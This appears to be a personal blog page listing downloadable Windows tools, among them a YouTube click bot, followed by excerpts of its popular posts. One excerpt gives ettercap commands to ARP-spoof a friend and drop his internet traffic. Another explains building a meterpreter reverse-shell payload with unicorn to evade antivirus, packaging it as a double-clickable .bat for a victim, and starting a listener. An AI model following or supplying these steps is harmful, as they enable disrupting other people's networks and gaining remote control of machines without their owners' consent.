Direkt zum Hauptbereich

Windows Downloads

Applications


cText (C# Text Editor)
MD5:  C8DD978197A238D8FC254967DA9963F8


CleanTmp (Temp junk cleaner)
SHA-1: 3C227D197D909CA3C466E8A096259015FDA8A774

FileViewer (File attribution manager)
MD5: 2976FF1CCE2CDED49549EBE5868F42C6


GenClick (YouTube click bot)
MD5: 8FDBBDBF439D8E696FADC7E082B5A8CD

spike.exe (Windows stress testing tool)
MD5: 48CE2E8789485D31ABFFB212C78ADA4E

SpotifyAdsRemover (Remove the ads on the spotify app)
MD5: 690CD9B362E2B9DA5F4F7DDC58069142


Process Spawner (Spawn fake processes to stop a virus)
MD5: DDA6F04F32BAD8DB47930E18CB079121


WinJunk (Windows junk cleaner)
MD5: 569F17BA4F9888119D87982266FFCE60

Games

Demon's Sphere v2.0 (Basic low-end horror game)
SHA-1: E348B730EAE335CBA37B85E068FCC4BF2047599C

Kommentare

Kommentar veröffentlichen

Beliebte Posts aus diesem Blog

Kill Internet using ettercap

Hey there, a friend annoyed me, because he used almost all of the bandwidth on my internet. So I couldn't watch any YouTube video. I thought I could kill his internet connection with my laptop. In this contribution I want to tell you how I've done. All you need: a computer running Linux ( Kali Linux in my case) with the tool  ettercap . Firstly you have to open a terminal and type 'ettercap --help'. There shall be a help menu. Ettercap is a tool, which is focused on   Man-in-the-middle-attacks . We must generate an "etterfilter". Go to your favourite text editor. Enter: drop(); kill(); After that, save it as "kill" or something like that. Now type 'etterfilter kill -o kill.ef'. Replace 'kill' with your name of the script. Etterfilter will compile your scipt now. Finally we can attack our target! Type 'ettercap -T -q -p -F kill.ef -M arp:remote /<your target IP>// /<your gateway//'. In older ettercap versions, ...

Metasploit payload bypass AV

Hello friends! Today I want you to bypass an anti-virus software with unicorn by TrustedSec. First of all you have to clone the script. So just open up a terminal an enter 'git clone https://github.com/TrustedSec/unicorn' (without apostrophes). Now enter the unicorn folder and run unicorn by typing './unicorn.py'. We have to generate the backdoor... In my case './unicorn.py windows/meterpreter/reverse_tcp 192.168.1.12 4444'. You simply have to replace my IP with yours and any port you want. After that the payload should be saved in the unicorn folder. In this file is the malicious command you want to execute on the victim machine. The easiest way to do this is to set the payload's file extension to '.bat', so you just have to double-click our file. At least we set up our listener. In the unicorn folder there should be a '.rc' file. So run 'msfconsole -r <your file>.rc'. Finally we're done... Have fun and don't b...

YouTube Night Mode

I just found out how to enable the night mode on YouTube, so I thought I could show you how to. First you have to go on YouTube . Open the console in your webbrowser ('ctrl + shift + i' on Google Chrome) and enter the following command: ######################################## var cookieDate = new Date(); cookieDate.setFullYear(cookieDate.getFullYear( ) + 1); document.cookie="VISITOR_INFO1_LIVE=fPQ4jCL6EiE; expires=" + cookieDate.toGMTString( ) + "; path=/"; ######################################## Hit enter and refresh the website with 'ctrl + r' or 'F5'. Now you can see the new design on YouTube. Click on your profile picture and enable the night mode. To remove the new design, enter the same command but replace the '1' with a '0'. Have fun!